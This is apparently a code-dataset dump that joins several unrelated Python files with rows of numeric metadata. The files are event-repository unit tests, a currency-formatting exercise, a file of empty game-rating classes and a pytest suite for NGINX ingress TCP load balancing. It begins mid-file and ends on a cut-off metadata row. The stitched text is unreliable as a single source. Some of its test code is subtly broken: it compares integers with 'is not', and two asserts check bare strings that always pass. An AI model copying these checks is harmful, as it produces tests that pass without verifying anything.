@patch('src.t1000.infrastructure.persistence.events_in_memory_repo.Event')
@patch('src.t1000.infrastructure.persistence.events_in_memory_repo.Events')
def test_get_from_date_more_events(self, events_mock, event_mock: Mock):
events_in_memory_repo = EventsInMemoryRepo()
events_in_memory_repo.get_from_date('2019-10-15')
self.assertEqual(event_mock.call_count, 5)
args, kwargs = events_mock.call_args
self.assertEqual(len(args[0]), 5)
@patch('src.t1000.infrastructure.persistence.events_in_memory_repo.Event')
@patch('src.t1000.infrastructure.persistence.events_in_memory_repo.Events')
def test_get_from_interval(self, events_mock, event_mock):
events_in_memory_repo = EventsInMemoryRepo()
events_in_memory_repo.get_from_interval('2019-10-15', '2019-10-16')
self.assertEqual(event_mock.call_count, 6)
args, kwargs = events_mock.call_args
self.assertEqual(len(args[0]), 6)
@patch('src.t1000.infrastructure.persistence.events_in_memory_repo.Event')
@patch('src.t1000.infrastructure.persistence.events_in_memory_repo.Events')
def test_find_all(self, events_mock, event_mock):
events_in_memory_repo = EventsInMemoryRepo()
events_in_memory_repo.find_all()
self.assertEqual(event_mock.call_count, 8)
args, kwargs = events_mock.call_args
self.assertEqual(len(args[0]), 8)
def test_save(self):
event_to_save = Mock(date=datetime.today().date().isoformat())
events_in_memory_repo = EventsInMemoryRepo()
events_in_memory_repo.save(event_to_save)
events_result = events_in_memory_repo.find_all()
self.assertEqual(len(events_result.events), 9)
events_result = events_in_memory_repo.get_from_date(datetime.today()\
.date().isoformat())
self.assertEqual(len(events_result.events), 1)
@patch('src.t1000.infrastructure.persistence.events_in_memory_repo.Event')
@patch('src.t1000.infrastructure.persistence.events_in_memory_repo.Events')
def test_events_before_date(self, events_mock, event_mock):
events_in_memory_repo = EventsInMemoryRepo()
events_in_memory_repo.get_from_interval(end='2019-10-10')
self.assertEqual(event_mock.call_count, 2)
args, kwargs = events_mock.call_args
self.assertEqual(len(args[0]), 2)
@patch('src.t1000.infrastructure.persistence.events_in_memory_repo.Event')
@patch('src.t1000.infrastructure.persistence.events_in_memory_repo.Events')
def test_events_after_date(self, events_mock, event_mock):
events_in_memory_repo = EventsInMemoryRepo()
events_in_memory_repo.get_from_interval(init='2019-10-02')
self.assertEqual(event_mock.call_count, 6)
args, kwargs = events_mock.call_args
self.assertEqual(len(args[0]), 6)
| 46.797468 | 80 | 0.727076 | 483 | 3,697 | 5.223602 | 0.130435 | 0.088783 | 0.155371 | 0.199762 | 0.839477 | 0.808165 | 0.742767 | 0.731272 | 0.706698 | 0.685295 | 0 | 0.038699 | 0.168245 | 3,697 | 78 | 81 | 47.397436 | 0.781789 | 0 | 0 | 0.439394 | 0 | 0 | 0.225588 | 0.209359 | 0 | 0 | 0 | 0 | 0.212121 | 1 | 0.136364 | false | 0 | 0.060606 | 0.030303 | 0.242424 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d7a6a09ea6334eedb747b6bb901fa95f60eeb3eb | 601 | py | Python | Exercicios/modulos/ex109/moeda.py | anderdot/curso-em-video-python | ea295cf0afa914ff9ab9acb87c458d77e3fb62ad | [
"MIT"
] | null | null | null | Exercicios/modulos/ex109/moeda.py | anderdot/curso-em-video-python | ea295cf0afa914ff9ab9acb87c458d77e3fb62ad | [
"MIT"
] | null | null | null | Exercicios/modulos/ex109/moeda.py | anderdot/curso-em-video-python | ea295cf0afa914ff9ab9acb87c458d77e3fb62ad | [
"MIT"
] | null | null | null | from rotinas import var
def aumentar(preco=0, taxa=0, formato=False):
res = preco + (preco * taxa / 100)
return moeda(res) if formato else res
def diminuir(preco=0, taxa=0, formato=False):
res = preco - (preco * taxa / 100)
return moeda(res) if formato else res
def dobro(preco=0, formato=False):
res = preco * 2
return moeda(res) if formato else res
def metade(preco=0, formato=False):
res = preco / 2
return moeda(res) if formato else res
def moeda(preco=0, moeda='R$ '):
preco = f'{preco:.2f}'.replace('.', ',')
return f'{moeda}{var(preco)}'
| 24.04 | 45 | 0.630616 | 92 | 601 | 4.119565 | 0.271739 | 0.079156 | 0.137203 | 0.168865 | 0.717678 | 0.717678 | 0.717678 | 0.717678 | 0.717678 | 0.717678 | 0 | 0.034409 | 0.22629 | 601 | 24 | 46 | 25.041667 | 0.780645 | 0 | 0 | 0.25 | 0 | 0 | 0.058236 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.3125 | false | 0 | 0.0625 | 0 | 0.6875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
d7c61c037c0771cf9b1571eaf4543f03cde2f366 | 6,269 | py | Python | loldib/getratings/models/NA/na_ahri/na_ahri_sup.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_ahri/na_ahri_sup.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_ahri/na_ahri_sup.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | from getratings.models.ratings import Ratings
class NA_Ahri_Sup_Aatrox(Ratings):
pass
class NA_Ahri_Sup_Ahri(Ratings):
pass
class NA_Ahri_Sup_Akali(Ratings):
pass
class NA_Ahri_Sup_Alistar(Ratings):
pass
class NA_Ahri_Sup_Amumu(Ratings):
pass
class NA_Ahri_Sup_Anivia(Ratings):
pass
class NA_Ahri_Sup_Annie(Ratings):
pass
class NA_Ahri_Sup_Ashe(Ratings):
pass
class NA_Ahri_Sup_AurelionSol(Ratings):
pass
class NA_Ahri_Sup_Azir(Ratings):
pass
class NA_Ahri_Sup_Bard(Ratings):
pass
class NA_Ahri_Sup_Blitzcrank(Ratings):
pass
class NA_Ahri_Sup_Brand(Ratings):
pass
class NA_Ahri_Sup_Braum(Ratings):
pass
class NA_Ahri_Sup_Caitlyn(Ratings):
pass
class NA_Ahri_Sup_Camille(Ratings):
pass
class NA_Ahri_Sup_Cassiopeia(Ratings):
pass
class NA_Ahri_Sup_Chogath(Ratings):
pass
class NA_Ahri_Sup_Corki(Ratings):
pass
class NA_Ahri_Sup_Darius(Ratings):
pass
class NA_Ahri_Sup_Diana(Ratings):
pass
class NA_Ahri_Sup_Draven(Ratings):
pass
class NA_Ahri_Sup_DrMundo(Ratings):
pass
class NA_Ahri_Sup_Ekko(Ratings):
pass
class NA_Ahri_Sup_Elise(Ratings):
pass
class NA_Ahri_Sup_Evelynn(Ratings):
pass
class NA_Ahri_Sup_Ezreal(Ratings):
pass
class NA_Ahri_Sup_Fiddlesticks(Ratings):
pass
class NA_Ahri_Sup_Fiora(Ratings):
pass
class NA_Ahri_Sup_Fizz(Ratings):
pass
class NA_Ahri_Sup_Galio(Ratings):
pass
class NA_Ahri_Sup_Gangplank(Ratings):
pass
class NA_Ahri_Sup_Garen(Ratings):
pass
class NA_Ahri_Sup_Gnar(Ratings):
pass
class NA_Ahri_Sup_Gragas(Ratings):
pass
class NA_Ahri_Sup_Graves(Ratings):
pass
class NA_Ahri_Sup_Hecarim(Ratings):
pass
class NA_Ahri_Sup_Heimerdinger(Ratings):
pass
class NA_Ahri_Sup_Illaoi(Ratings):
pass
class NA_Ahri_Sup_Irelia(Ratings):
pass
class NA_Ahri_Sup_Ivern(Ratings):
pass
class NA_Ahri_Sup_Janna(Ratings):
pass
class NA_Ahri_Sup_JarvanIV(Ratings):
pass
class NA_Ahri_Sup_Jax(Ratings):
pass
class NA_Ahri_Sup_Jayce(Ratings):
pass
class NA_Ahri_Sup_Jhin(Ratings):
pass
class NA_Ahri_Sup_Jinx(Ratings):
pass
class NA_Ahri_Sup_Kalista(Ratings):
pass
class NA_Ahri_Sup_Karma(Ratings):
pass
class NA_Ahri_Sup_Karthus(Ratings):
pass
class NA_Ahri_Sup_Kassadin(Ratings):
pass
class NA_Ahri_Sup_Katarina(Ratings):
pass
class NA_Ahri_Sup_Kayle(Ratings):
pass
class NA_Ahri_Sup_Kayn(Ratings):
pass
class NA_Ahri_Sup_Kennen(Ratings):
pass
class NA_Ahri_Sup_Khazix(Ratings):
pass
class NA_Ahri_Sup_Kindred(Ratings):
pass
class NA_Ahri_Sup_Kled(Ratings):
pass
class NA_Ahri_Sup_KogMaw(Ratings):
pass
class NA_Ahri_Sup_Leblanc(Ratings):
pass
class NA_Ahri_Sup_LeeSin(Ratings):
pass
class NA_Ahri_Sup_Leona(Ratings):
pass
class NA_Ahri_Sup_Lissandra(Ratings):
pass
class NA_Ahri_Sup_Lucian(Ratings):
pass
class NA_Ahri_Sup_Lulu(Ratings):
pass
class NA_Ahri_Sup_Lux(Ratings):
pass
class NA_Ahri_Sup_Malphite(Ratings):
pass
class NA_Ahri_Sup_Malzahar(Ratings):
pass
class NA_Ahri_Sup_Maokai(Ratings):
pass
class NA_Ahri_Sup_MasterYi(Ratings):
pass
class NA_Ahri_Sup_MissFortune(Ratings):
pass
class NA_Ahri_Sup_MonkeyKing(Ratings):
pass
class NA_Ahri_Sup_Mordekaiser(Ratings):
pass
class NA_Ahri_Sup_Morgana(Ratings):
pass
class NA_Ahri_Sup_Nami(Ratings):
pass
class NA_Ahri_Sup_Nasus(Ratings):
pass
class NA_Ahri_Sup_Nautilus(Ratings):
pass
class NA_Ahri_Sup_Nidalee(Ratings):
pass
class NA_Ahri_Sup_Nocturne(Ratings):
pass
class NA_Ahri_Sup_Nunu(Ratings):
pass
class NA_Ahri_Sup_Olaf(Ratings):
pass
class NA_Ahri_Sup_Orianna(Ratings):
pass
class NA_Ahri_Sup_Ornn(Ratings):
pass
class NA_Ahri_Sup_Pantheon(Ratings):
pass
class NA_Ahri_Sup_Poppy(Ratings):
pass
class NA_Ahri_Sup_Quinn(Ratings):
pass
class NA_Ahri_Sup_Rakan(Ratings):
pass
class NA_Ahri_Sup_Rammus(Ratings):
pass
class NA_Ahri_Sup_RekSai(Ratings):
pass
class NA_Ahri_Sup_Renekton(Ratings):
pass
class NA_Ahri_Sup_Rengar(Ratings):
pass
class NA_Ahri_Sup_Riven(Ratings):
pass
class NA_Ahri_Sup_Rumble(Ratings):
pass
class NA_Ahri_Sup_Ryze(Ratings):
pass
class NA_Ahri_Sup_Sejuani(Ratings):
pass
class NA_Ahri_Sup_Shaco(Ratings):
pass
class NA_Ahri_Sup_Shen(Ratings):
pass
class NA_Ahri_Sup_Shyvana(Ratings):
pass
class NA_Ahri_Sup_Singed(Ratings):
pass
class NA_Ahri_Sup_Sion(Ratings):
pass
class NA_Ahri_Sup_Sivir(Ratings):
pass
class NA_Ahri_Sup_Skarner(Ratings):
pass
class NA_Ahri_Sup_Sona(Ratings):
pass
class NA_Ahri_Sup_Soraka(Ratings):
pass
class NA_Ahri_Sup_Swain(Ratings):
pass
class NA_Ahri_Sup_Syndra(Ratings):
pass
class NA_Ahri_Sup_TahmKench(Ratings):
pass
class NA_Ahri_Sup_Taliyah(Ratings):
pass
class NA_Ahri_Sup_Talon(Ratings):
pass
class NA_Ahri_Sup_Taric(Ratings):
pass
class NA_Ahri_Sup_Teemo(Ratings):
pass
class NA_Ahri_Sup_Thresh(Ratings):
pass
class NA_Ahri_Sup_Tristana(Ratings):
pass
class NA_Ahri_Sup_Trundle(Ratings):
pass
class NA_Ahri_Sup_Tryndamere(Ratings):
pass
class NA_Ahri_Sup_TwistedFate(Ratings):
pass
class NA_Ahri_Sup_Twitch(Ratings):
pass
class NA_Ahri_Sup_Udyr(Ratings):
pass
class NA_Ahri_Sup_Urgot(Ratings):
pass
class NA_Ahri_Sup_Varus(Ratings):
pass
class NA_Ahri_Sup_Vayne(Ratings):
pass
class NA_Ahri_Sup_Veigar(Ratings):
pass
class NA_Ahri_Sup_Velkoz(Ratings):
pass
class NA_Ahri_Sup_Vi(Ratings):
pass
class NA_Ahri_Sup_Viktor(Ratings):
pass
class NA_Ahri_Sup_Vladimir(Ratings):
pass
class NA_Ahri_Sup_Volibear(Ratings):
pass
class NA_Ahri_Sup_Warwick(Ratings):
pass
class NA_Ahri_Sup_Xayah(Ratings):
pass
class NA_Ahri_Sup_Xerath(Ratings):
pass
class NA_Ahri_Sup_XinZhao(Ratings):
pass
class NA_Ahri_Sup_Yasuo(Ratings):
pass
class NA_Ahri_Sup_Yorick(Ratings):
pass
class NA_Ahri_Sup_Zac(Ratings):
pass
class NA_Ahri_Sup_Zed(Ratings):
pass
class NA_Ahri_Sup_Ziggs(Ratings):
pass
class NA_Ahri_Sup_Zilean(Ratings):
pass
class NA_Ahri_Sup_Zyra(Ratings):
pass
| 15.033573 | 46 | 0.75642 | 972 | 6,269 | 4.452675 | 0.151235 | 0.223198 | 0.350739 | 0.446396 | 0.791359 | 0.791359 | 0 | 0 | 0 | 0 | 0 | 0 | 0.177221 | 6,269 | 416 | 47 | 15.069712 | 0.839085 | 0 | 0 | 0.498195 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.498195 | 0.00361 | 0 | 0.501805 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
0bd5e72ce4fe1dc4086d32c921ae6356e9c3e506 | 21,527 | py | Python | tests/suite/test_transport_server_tcp_load_balance.py | Taymindis/kubernetes-ingress | 28d02e476455b2fd9ac9446cdff06749642ddb0c | [
"Apache-2.0"
] | 1 | 2022-03-31T02:00:58.000Z | 2022-03-31T02:00:58.000Z | tests/suite/test_transport_server_tcp_load_balance.py | Taymindis/kubernetes-ingress | 28d02e476455b2fd9ac9446cdff06749642ddb0c | [
"Apache-2.0"
] | 89 | 2021-11-29T12:08:39.000Z | 2022-03-31T03:29:00.000Z | tests/suite/test_transport_server_tcp_load_balance.py | Taymindis/kubernetes-ingress | 28d02e476455b2fd9ac9446cdff06749642ddb0c | [
"Apache-2.0"
] | null | null | null | import pytest
import re
import socket
import time
from urllib3.exceptions import NewConnectionError
from suite.resources_utils import (
wait_before_test,
get_ts_nginx_template_conf,
scale_deployment,
get_events,
wait_for_event_increment,
)
from suite.custom_resources_utils import (
patch_ts_from_yaml,
read_ts,
delete_ts,
create_ts_from_yaml,
)
from settings import TEST_DATA
@pytest.mark.ts
@pytest.mark.skip_for_loadbalancer
@pytest.mark.parametrize(
"crd_ingress_controller, transport_server_setup",
[
(
{
"type": "complete",
"extra_args":
[
"-global-configuration=nginx-ingress/nginx-configuration",
"-enable-leader-election=false"
]
},
{"example": "transport-server-tcp-load-balance"},
)
],
indirect=True,
)
class TestTransportServerTcpLoadBalance:
def restore_ts(self, kube_apis, transport_server_setup) -> None:
"""
Function to revert a TransportServer resource to a valid state.
"""
patch_src = f"{TEST_DATA}/transport-server-tcp-load-balance/standard/transport-server.yaml"
patch_ts_from_yaml(
kube_apis.custom_objects,
transport_server_setup.name,
patch_src,
transport_server_setup.namespace,
)
wait_before_test()
def test_number_of_replicas(
self, kube_apis, crd_ingress_controller, transport_server_setup, ingress_controller_prerequisites
):
"""
The load balancing of TCP should result in 4 servers to match the 4 replicas of a service.
"""
original = scale_deployment(kube_apis.v1, kube_apis.apps_v1_api,
"tcp-service", transport_server_setup.namespace, 4)
num_servers = 0
retry = 0
while(num_servers is not 4 and retry <= 30):
result_conf = get_ts_nginx_template_conf(
kube_apis.v1,
transport_server_setup.namespace,
transport_server_setup.name,
transport_server_setup.ingress_pod_name,
ingress_controller_prerequisites.namespace
)
pattern = 'server .*;'
num_servers = len(re.findall(pattern, result_conf))
retry += 1
wait_before_test(1)
print(f"Retry #{retry}")
assert num_servers is 4
scale_deployment(kube_apis.v1, kube_apis.apps_v1_api, "tcp-service",
transport_server_setup.namespace, original)
retry = 0
while(num_servers is not original and retry <= 50):
result_conf = get_ts_nginx_template_conf(
kube_apis.v1,
transport_server_setup.namespace,
transport_server_setup.name,
transport_server_setup.ingress_pod_name,
ingress_controller_prerequisites.namespace
)
pattern = 'server .*;'
num_servers = len(re.findall(pattern, result_conf))
retry += 1
wait_before_test(1)
print(f"Retry #{retry}")
assert num_servers is original
def test_tcp_request_load_balanced(
self, kube_apis, crd_ingress_controller, transport_server_setup, ingress_controller_prerequisites
):
"""
Requests to the load balanced TCP service should result in responses from 3 different endpoints.
"""
wait_before_test()
port = transport_server_setup.public_endpoint.tcp_server_port
host = transport_server_setup.public_endpoint.public_ip
print(f"sending tcp requests to: {host}:{port}")
endpoints = {}
retry = 0
while(len(endpoints) is not 3 and retry <= 30):
for i in range(20):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
client.sendall(b'connect')
response = client.recv(4096)
endpoint = response.decode()
print(f' req number {i}; response: {endpoint}')
if endpoint not in endpoints:
endpoints[endpoint] = 1
else:
endpoints[endpoint] = endpoints[endpoint] + 1
client.close()
retry += 1
wait_before_test(1)
print(f"Retry #{retry}")
assert len(endpoints) is 3
result_conf = get_ts_nginx_template_conf(
kube_apis.v1,
transport_server_setup.namespace,
transport_server_setup.name,
transport_server_setup.ingress_pod_name,
ingress_controller_prerequisites.namespace
)
pattern = 'server .*;'
servers = re.findall(pattern, result_conf)
for key in endpoints.keys():
found = False
for server in servers:
if key in server:
found = True
assert found
def test_tcp_request_load_balanced_multiple(
self, kube_apis, crd_ingress_controller, transport_server_setup
):
"""
Requests to the load balanced TCP service should result in responses from 3 different endpoints.
"""
port = transport_server_setup.public_endpoint.tcp_server_port
host = transport_server_setup.public_endpoint.public_ip
# Step 1, confirm load balancing is working.
print(f"sending tcp requests to: {host}:{port}")
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
client.sendall(b'connect')
response = client.recv(4096)
endpoint = response.decode()
print(f'response: {endpoint}')
client.close()
assert endpoint is not ""
# Step 2, add a second TransportServer with the same port and confirm the collision
transport_server_file = f"{TEST_DATA}/transport-server-tcp-load-balance/second-transport-server.yaml"
ts_resource = create_ts_from_yaml(
kube_apis.custom_objects, transport_server_file, transport_server_setup.namespace
)
wait_before_test()
second_ts_name = ts_resource['metadata']['name']
response = read_ts(
kube_apis.custom_objects,
transport_server_setup.namespace,
second_ts_name,
)
assert (
response["status"]
and response["status"]["reason"] == "Rejected"
and response["status"]["state"] == "Warning"
and response["status"]["message"] == "Listener tcp-server is taken by another resource"
)
# Step 3, remove the default TransportServer with the same port
delete_ts(kube_apis.custom_objects, transport_server_setup.resource,
transport_server_setup.namespace)
wait_before_test()
response = read_ts(
kube_apis.custom_objects,
transport_server_setup.namespace,
second_ts_name,
)
assert (
response["status"]
and response["status"]["reason"] == "AddedOrUpdated"
and response["status"]["state"] == "Valid"
)
# Step 4, confirm load balancing is still working.
print(f"sending tcp requests to: {host}:{port}")
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
client.sendall(b'connect')
response = client.recv(4096)
endpoint = response.decode()
print(f'response: {endpoint}')
client.close()
assert endpoint is not ""
# cleanup
delete_ts(kube_apis.custom_objects, ts_resource, transport_server_setup.namespace)
transport_server_file = f"{TEST_DATA}/transport-server-tcp-load-balance/standard/transport-server.yaml"
create_ts_from_yaml(
kube_apis.custom_objects, transport_server_file, transport_server_setup.namespace
)
wait_before_test()
def test_tcp_request_load_balanced_wrong_port(
self, kube_apis, crd_ingress_controller, transport_server_setup
):
"""
Requests to the load balanced TCP service should result in responses from 3 different endpoints.
"""
patch_src = f"{TEST_DATA}/transport-server-tcp-load-balance/wrong-port-transport-server.yaml"
patch_ts_from_yaml(
kube_apis.custom_objects,
transport_server_setup.name,
patch_src,
transport_server_setup.namespace,
)
wait_before_test()
port = transport_server_setup.public_endpoint.tcp_server_port
host = transport_server_setup.public_endpoint.public_ip
print(f"sending tcp requests to: {host}:{port}")
for i in range(3):
try:
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
client.sendall(b'connect')
except ConnectionResetError as E:
print("The expected exception occurred:", E)
self.restore_ts(kube_apis, transport_server_setup)
def test_tcp_request_load_balanced_missing_service(
self, kube_apis, crd_ingress_controller, transport_server_setup
):
"""
Requests to the load balanced TCP service should result in responses from 3 different endpoints.
"""
patch_src = f"{TEST_DATA}/transport-server-tcp-load-balance/missing-service-transport-server.yaml"
patch_ts_from_yaml(
kube_apis.custom_objects,
transport_server_setup.name,
patch_src,
transport_server_setup.namespace,
)
wait_before_test()
port = transport_server_setup.public_endpoint.tcp_server_port
host = transport_server_setup.public_endpoint.public_ip
print(f"sending tcp requests to: {host}:{port}")
for i in range(3):
try:
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
client.sendall(b'connect')
except ConnectionResetError as E:
print("The expected exception occurred:", E)
self.restore_ts(kube_apis, transport_server_setup)
def make_holding_connection(self, host, port):
print(f"sending tcp requests to: {host}:{port}")
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
client.sendall(b'hold')
response = client.recv(4096)
endpoint = response.decode()
print(f'response: {endpoint}')
return client
def test_tcp_request_max_connections(
self, kube_apis, crd_ingress_controller, transport_server_setup, ingress_controller_prerequisites
):
"""
The config, maxConns, should limit the number of open TCP connections.
3 replicas of max 2 connections is 6, so making the 7th connection will fail.
"""
# step 1 - set max connections to 2 with 1 replica
patch_src = f"{TEST_DATA}/transport-server-tcp-load-balance/max-connections-transport-server.yaml"
patch_ts_from_yaml(
kube_apis.custom_objects,
transport_server_setup.name,
patch_src,
transport_server_setup.namespace,
)
wait_before_test()
configs = 0
retry = 0
while(configs is not 3 and retry <= 30):
result_conf = get_ts_nginx_template_conf(
kube_apis.v1,
transport_server_setup.namespace,
transport_server_setup.name,
transport_server_setup.ingress_pod_name,
ingress_controller_prerequisites.namespace
)
pattern = 'max_conns=2'
configs = len(re.findall(pattern, result_conf))
retry += 1
wait_before_test(1)
print(f"Retry #{retry}")
assert configs is 3
# step 2 - make the number of allowed connections
port = transport_server_setup.public_endpoint.tcp_server_port
host = transport_server_setup.public_endpoint.public_ip
clients = []
for i in range(6):
c = self.make_holding_connection(host, port)
clients.append(c)
# step 3 - assert the next connection fails
try:
c = self.make_holding_connection(host, port)
# making a connection should fail and throw an exception
assert c is None
except ConnectionResetError as E:
print("The expected exception occurred:", E)
for c in clients:
c.close()
# step 4 - revert to config with no max connections
patch_src = f"{TEST_DATA}/transport-server-tcp-load-balance/standard/transport-server.yaml"
patch_ts_from_yaml(
kube_apis.custom_objects,
transport_server_setup.name,
patch_src,
transport_server_setup.namespace,
)
wait_before_test()
# step 5 - confirm making lots of connections doesn't cause an error
clients = []
for i in range(24):
c = self.make_holding_connection(host, port)
clients.append(c)
for c in clients:
c.close()
def test_tcp_request_load_balanced_method(
self, kube_apis, crd_ingress_controller, transport_server_setup, ingress_controller_prerequisites
):
"""
Update load balancing method to 'hash'. This send requests to a specific pod based on it's IP. In this case
resulting in a single endpoint handling all the requests.
"""
# Step 1 - set the load balancing method.
patch_src = f"{TEST_DATA}/transport-server-tcp-load-balance/method-transport-server.yaml"
patch_ts_from_yaml(
kube_apis.custom_objects,
transport_server_setup.name,
patch_src,
transport_server_setup.namespace,
)
wait_before_test()
num_servers = 0
retry = 0
while(num_servers is not 3 and retry <= 30):
result_conf = get_ts_nginx_template_conf(
kube_apis.v1,
transport_server_setup.namespace,
transport_server_setup.name,
transport_server_setup.ingress_pod_name,
ingress_controller_prerequisites.namespace
)
pattern = 'server .*;'
num_servers = len(re.findall(pattern, result_conf))
retry += 1
wait_before_test(1)
print(f"Retry #{retry}")
assert num_servers is 3
# Step 2 - confirm all request go to the same endpoint.
port = transport_server_setup.public_endpoint.tcp_server_port
host = transport_server_setup.public_endpoint.public_ip
endpoints = {}
retry = 0
while(len(endpoints) is not 1 and retry <= 30):
for i in range(20):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
client.sendall(b'connect')
response = client.recv(4096)
endpoint = response.decode()
print(f' req number {i}; response: {endpoint}')
if endpoint not in endpoints:
endpoints[endpoint] = 1
else:
endpoints[endpoint] = endpoints[endpoint] + 1
client.close()
retry += 1
wait_before_test(1)
print(f"Retry #{retry}")
assert len(endpoints) is 1
# Step 3 - restore to default load balancing method and confirm requests are balanced.
self.restore_ts(kube_apis, transport_server_setup)
wait_before_test()
endpoints = {}
retry = 0
while(len(endpoints) is not 3 and retry <= 30):
for i in range(20):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
client.sendall(b'connect')
response = client.recv(4096)
endpoint = response.decode()
print(f' req number {i}; response: {endpoint}')
if endpoint not in endpoints:
endpoints[endpoint] = 1
else:
endpoints[endpoint] = endpoints[endpoint] + 1
client.close()
retry += 1
wait_before_test(1)
print(f"Retry #{retry}")
assert len(endpoints) is 3
@pytest.mark.skip_for_nginx_oss
def test_tcp_passing_healthcheck_with_match(
self, kube_apis, crd_ingress_controller, transport_server_setup, ingress_controller_prerequisites
):
"""
Configure a passing health check and check that all backend pods return responses.
"""
# Step 1 - configure a passing health check
patch_src = f"{TEST_DATA}/transport-server-tcp-load-balance/passing-hc-transport-server.yaml"
patch_ts_from_yaml(
kube_apis.custom_objects,
transport_server_setup.name,
patch_src,
transport_server_setup.namespace,
)
# 4s includes 3s timeout for a health check to fail in case of a connection timeout to a backend pod
wait_before_test(4)
result_conf = get_ts_nginx_template_conf(
kube_apis.v1,
transport_server_setup.namespace,
transport_server_setup.name,
transport_server_setup.ingress_pod_name,
ingress_controller_prerequisites.namespace
)
match = f"match_ts_{transport_server_setup.namespace}_transport-server_tcp-app"
assert "health_check interval=5s" in result_conf
assert f"passes=1 jitter=0s fails=1 match={match}" in result_conf
assert "health_check_timeout 3s;"
assert 'send "health"' in result_conf
assert 'expect "healthy"' in result_conf
# Step 2 - confirm load balancing works
port = transport_server_setup.public_endpoint.tcp_server_port
host = transport_server_setup.public_endpoint.public_ip
endpoints = {}
retry = 0
while(len(endpoints) is not 3 and retry <= 30):
for i in range(20):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
client.sendall(b'connect')
response = client.recv(4096)
endpoint = response.decode()
print(f' req number {i}; response: {endpoint}')
if endpoint not in endpoints:
endpoints[endpoint] = 1
else:
endpoints[endpoint] = endpoints[endpoint] + 1
client.close()
retry += 1
wait_before_test(1)
print(f"Retry #{retry}")
assert len(endpoints) is 3
# Step 3 - restore
self.restore_ts(kube_apis, transport_server_setup)
@pytest.mark.skip_for_nginx_oss
def test_tcp_failing_healthcheck_with_match(
self, kube_apis, crd_ingress_controller, transport_server_setup, ingress_controller_prerequisites
):
"""
Configure a failing health check and check that NGINX Plus resets connections.
"""
# Step 1 - configure a failing health check
patch_src = f"{TEST_DATA}/transport-server-tcp-load-balance/failing-hc-transport-server.yaml"
patch_ts_from_yaml(
kube_apis.custom_objects,
transport_server_setup.name,
patch_src,
transport_server_setup.namespace,
)
# 4s includes 3s timeout for a health check to fail in case of a connection timeout to a backend pod
wait_before_test(4)
result_conf = get_ts_nginx_template_conf(
kube_apis.v1,
transport_server_setup.namespace,
transport_server_setup.name,
transport_server_setup.ingress_pod_name,
ingress_controller_prerequisites.namespace
)
match = f"match_ts_{transport_server_setup.namespace}_transport-server_tcp-app"
assert "health_check interval=5s" in result_conf
assert f"passes=1 jitter=0s fails=1 match={match}" in result_conf
assert "health_check_timeout 3s"
assert 'send "health"' in result_conf
assert 'expect "unmatched"' in result_conf
# Step 2 - confirm load balancing doesn't work
port = transport_server_setup.public_endpoint.tcp_server_port
host = transport_server_setup.public_endpoint.public_ip
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
client.sendall(b'connect')
try:
client.recv(4096) # must return ConnectionResetError
client.close()
pytest.fail("We expected an error here, but didn't get it. Exiting...")
except ConnectionResetError as ex:
# expected error
print(f"There was an expected exception {str(ex)}")
# Step 3 - restore
self.restore_ts(kube_apis, transport_server_setup)
| 36.610544 | 115 | 0.612765 | 2,451 | 21,527 | 5.128111 | 0.113423 | 0.127695 | 0.127297 | 0.057682 | 0.815498 | 0.790755 | 0.768717 | 0.760522 | 0.747951 | 0.741268 | 0 | 0.011449 | 0.310215 | 21,527 | 587 | 116 | 36.672913 | 0.835006 | 0.102244 | 0 | 0.715247 | 0 | 0.011211 | 0.125262 | 0.05636 | 0 | 0 | 0 | 0 | 0.053812 | 1 | 0.024664 | false | 0.008969 | 0.017937 | 0 | 0.047085 | 0.056054 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0be71bea6331da56cc4f451d4fbeb9fbccd4547c | 4,452 | py | Python | examples/three_genes_recoded.py | alexismhill3/pinetree | 45a1c2eae4cb3677b26794b9f1dc8a304e237550 | [
"MIT"
